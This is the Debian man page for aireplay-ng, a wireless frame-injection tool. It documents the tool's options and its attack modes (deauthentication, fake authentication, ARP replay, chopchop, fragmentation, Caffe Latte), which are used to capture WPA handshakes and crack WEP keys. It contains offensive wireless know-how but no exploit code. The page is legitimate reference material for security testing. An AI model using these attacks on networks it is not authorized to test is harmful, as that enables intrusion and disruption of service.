1AIREPLAY-NG(1)              General Commands Manual             AIREPLAY-NG(1)
2
3
4

NAME

6       aireplay-ng  - inject packets into a wireless network to generate traf‐
7       fic
8

SYNOPSIS

10       aireplay-ng [options] <replay interface>
11

DESCRIPTION

13       aireplay-ng is used to inject/replay frames.  The primary  function  is
14       to  generate  traffic for the later use in aircrack-ng for cracking the
15       WEP and WPA-PSK keys. There are different attacks which can cause deau‐
16       thentications  for  the  purpose  of capturing WPA handshake data, fake
17       authentications, Interactive packet replay,  hand-crafted  ARP  request
18       injection  and  ARP-request  reinjection.  With the packetforge-ng tool
19       it's possible to create arbitrary frames.
20
21       aireplay-ng supports single-NIC injection/monitor.
22       This feature needs driver patching.
23

OPTIONS

25       -H, --help
26              Shows the help screen.
27
28       Filter options:
29
30       -b <bssid>
31              MAC address of access point.
32
33       -d <dmac>
34              MAC address of destination.
35
36       -s <smac>
37              MAC address of source.
38
39       -m <len>
40              Minimum packet length.
41
42       -n <len>
43              Maximum packet length.
44
45       -u <type>
46              Frame control, type field.
47
48       -v <subt>
49              Frame control, subtype field.
50
51       -t <tods>
52              Frame control, "To" DS bit (0 or 1).
53
54       -f <fromds>
55              Frame control, "From" DS bit (0 or 1).
56
57       -w <iswep>
58              Frame control, WEP bit (0 or 1).
59
60       -D     Disable AP Detection.
61
62       Replay options:
63
64       -x <nbpps>
65              Number of packets per second.
66
67       -p <fctrl>
68              Set frame control word (hex).
69
70       -a <bssid>
71              Set Access Point MAC address.
72
73       -c <dmac>
74              Set destination MAC address.
75
76       -h <smac>
77              Set source MAC address.
78
79       -g <nb_packets>
80              Change ring buffer size (default: 8 packets). The minimum is 1.
81
82       -F     Choose first matching packet.
83
84       -e <essid>
85              Fake Authentication attack: Set target  SSID  (see  below).  For
86              SSID  containing  special  characters,  see http://www.aircrack-
87              ng.org/doku.php?id=faq#how_to_use_spaces_double_quote_and_sin‐
88              gle_quote_etc._in_ap_names
89
90       -o <npackets>
91              Fake  Authentication attack: Set the number of packets for every
92              authentication and association attempt  (Default:  1).  0  means
93              auto
94
95       -q <seconds>
96              Fake  Authentication  attack:  Set  the  time between keep-alive
97              packets in fake authentication mode.
98
99       -y <prga>
100              Fake Authentication attack: Specifies  the  keystream  file  for
101              fake shared key authentication.
102
103       -T n   Fake  Authentication  attack:  Exit if fake authentication fails
104              'n' time(s).
105
106       -j     ARP Replay attack : inject FromDS pakets (see below).
107
108       -k <IP>
109              Fragmentation attack: Set destination IP in fragments.
110
111       -l <IP>
112              Fragmentation attack: Set source IP in fragments.
113
114       -B     Test option: bitrate test.
115
116       Source options:
117
118       -i <iface>
119              Capture packets from this interface.
120
121       -r <file>
122              Extract packets from this pcap file.
123
124       Miscellaneous options:
125
126       -R     disable /dev/rtc usage.
127
128       Attack modes:
129
130       -0 <count>, --deauth=<count>
131              This attack  sends  deauthentication  packets  to  one  or  more
132              clients  which are currently associated with a particular access
133              point. Deauthenticating clients can be done for a number of rea‐
134              sons:  Recovering  a hidden ESSID. This is an ESSID which is not
135              being broadcast. Another term for this is "cloaked" or Capturing
136              WPA/WPA2 handshakes by forcing clients to reauthenticate or Gen‐
137              erate ARP requests (Windows clients sometimes  flush  their  ARP
138              cache  when  disconnected).   Of  course, this attack is totally
139              useless if there are no associated wireless client  or  on  fake
140              authentications.
141
142       -1 <delay>, --fakeauth=<delay>
143              The  fake  authentication  attack  allows you to perform the two
144              types of WEP authentication (Open System and  Shared  Key)  plus
145              associate  with  the  access  point (AP). This is useful is only
146              useful when you need an associated MAC address in various  aire‐
147              play-ng  attacks and there is currently no associated client. It
148              should be noted that the fake  authentication  attack  does  NOT
149              generate  any ARP packets. Fake authentication cannot be used to
150              authenticate/associate with WPA/WPA2 Access Points.
151
152       -2, --interactive
153              This attack allows you to choose a specific packet for replaying
154              (injecting).  The  attack  can obtain packets to replay from two
155              sources. The first being a live flow of packets from your  wire‐
156              less  card.  The  second  being from a pcap file. Reading from a
157              file is an often overlooked feature of aireplay-ng. This  allows
158              you  read  packets  from  other capture sessions or quite often,
159              various attacks generate pcap files for easy reuse. A common use
160              of  reading a file containing a packet your created with packet‐
161              forge-ng.
162
163       -3, --arpreplay
164              The classic ARP request replay attack is the most effective  way
165              to  generate  new  initialization  vectors (IVs), and works very
166              reliably. The program listens for an ARP packet then retransmits
167              it  back  to  the access point. This, in turn, causes the access
168              point to repeat the ARP  packet  with  a  new  IV.  The  program
169              retransmits the same ARP packet over and over. However, each ARP
170              packet repeated by the access point has a new  IVs.  It  is  all
171              these new IVs which allow you to determine the WEP key.
172
173       -4, --chopchop
174              This  attack,  when  successful,  can  decrypt a WEP data packet
175              without knowing the key. It can even work against  dynamic  WEP.
176              This  attack  does  not  recover  the WEP key itself, but merely
177              reveals the plaintext. However, some access points are not  vul‐
178              nerable  to  this  attack. Some may seem vulnerable at first but
179              actually drop data packets shorter that 60 bytes. If the  access
180              point  drops  packets  shorter  than 42 bytes, aireplay tries to
181              guess the rest of the missing data, as far as  the  headers  are
182              predictable. If an IP packet is captured, it additionally checks
183              if the checksum of the header  is  correct  after  guessing  the
184              missing  parts of it. This attack requires at least one WEP data
185              packet.
186
187       -5, --fragment
188              This attack, when successful, can  obtain  1500  bytes  of  PRGA
189              (pseudo  random  generation  algorithm).  This  attack  does not
190              recover the WEP key itself, but merely  obtains  the  PRGA.  The
191              PRGA  can  then  be used to generate packets with packetforge-ng
192              which are  in  turn  used  for  various  injection  attacks.  It
193              requires at least one data packet to be received from the access
194              point in order to initiate the attack.
195
196       -6, --caffe-latte
197              In general, for an attack to work, the attacker has to be in the
198              range  of  an  AP  and  a connected client (fake or real). Caffe
199              Latte attacks allows to gather enough packets to crack a WEP key
200              without the need of an AP, it just need a client to be in range.
201
202       -7, --cfrag
203              This  attack  turns  IP  or  ARP  packets from a client into ARP
204              request against the client. This attack  works  especially  well
205              against  ad-hoc  networks. As well it can be used against softAP
206              clients and normal AP clients.
207
208       -9, --test
209              Tests injection and quality.
210

FRAGMENTATION VERSUS CHOPCHOP

212       Fragmentation:
213
214
215              Pros
216              - Can obtain the full packet length  of  1500  bytes  XOR.  This
217              means  you  can  subsequently  pretty  well  create  any size of
218              packet.
219              - May work where chopchop does not
220              - Is extremely fast. It yields the XOR stream extremely  quickly
221              when successful.
222
223
224              Cons
225              -  Setup  to  execute  the  attack is more subject to the device
226              drivers. For example, Atheros  does  not  generate  the  correct
227              packets  unless  the wireless card is set to the mac address you
228              are spoofing.
229              - You need to be physically closer to the access point since  if
230              any packets are lost then the attack fails.
231
232       Chopchop
233
234
235              Pro
236              - May work where frag does not work.
237
238
239              Cons
240              - Cannot be used against every access point.
241              -  The  maximum  XOR bits is limited to the length of the packet
242              you chopchop against.
243              - Much slower then the fragmentation attack.
244

AUTHOR

246       This manual page was written by Adam Cecile  <gandalf@le-vert.net>  for
247       the  Debian  system (but may be used by others).  Permission is granted
248       to copy, distribute and/or modify this document under the terms of  the
249       GNU General Public License, Version 2 or any later version published by
250       the Free Software Foundation On Debian systems, the  complete  text  of
251       the  GNU  General  Public  License  can  be found in /usr/share/common-
252       licenses/GPL.
253

SEE ALSO

255       airbase-ng(1)
256       aircrack-ng(1)
257       airdecap-ng(1)
258       airdecloak-ng(1)
259       airdriver-ng(1)
260       airmon-ng(1)
261       airodump-ng(1)
262       airolib-ng(1)
263       airserv-ng(1)
264       airtun-ng(1)
265       buddy-ng(1)
266       easside-ng(1)
267       ivstools(1)
268       kstats(1)
269       makeivs-ng(1)
270       packetforge-ng(1)
271       tkiptun-ng(1)
272       wesside-ng(1)
273
274
275
276Version 1.1                       April 2010                    AIREPLAY-NG(1)
Impressum